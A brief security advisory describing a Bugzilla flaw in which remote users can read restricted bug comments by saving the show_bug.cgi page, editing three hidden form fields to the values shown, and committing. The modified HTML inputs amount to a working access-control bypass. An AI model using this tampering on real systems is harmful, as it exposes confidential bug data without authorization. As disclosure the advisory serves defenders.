BugZilla Process_Bug.CGI Restricted Bug Comments Revealing Vulnerability

BugZilla Process_Bug.CGI Restricted Bug Comments Revealing Vulnerability

Bugzilla is the bug tracking software package by the Mozilla project.

A problem in Bugzilla has been discovered that allows remote users to gain access to restricted bug information. Upon viewing a restricted bug, the user may save the show_bug.cgi page, and monitor the hidden form fields to the following:

<INPUT TYPE=HIDDEN NAME="delta_ts" VALUE="19950000000000">
<INPUT TYPE=HIDDEN NAME="longdesclength" VALUE="0">
<INPUT TYPE=HIDDEN NAME="id" VALUE=bugid>

Loading this modified page, and clicking commit yields the comments.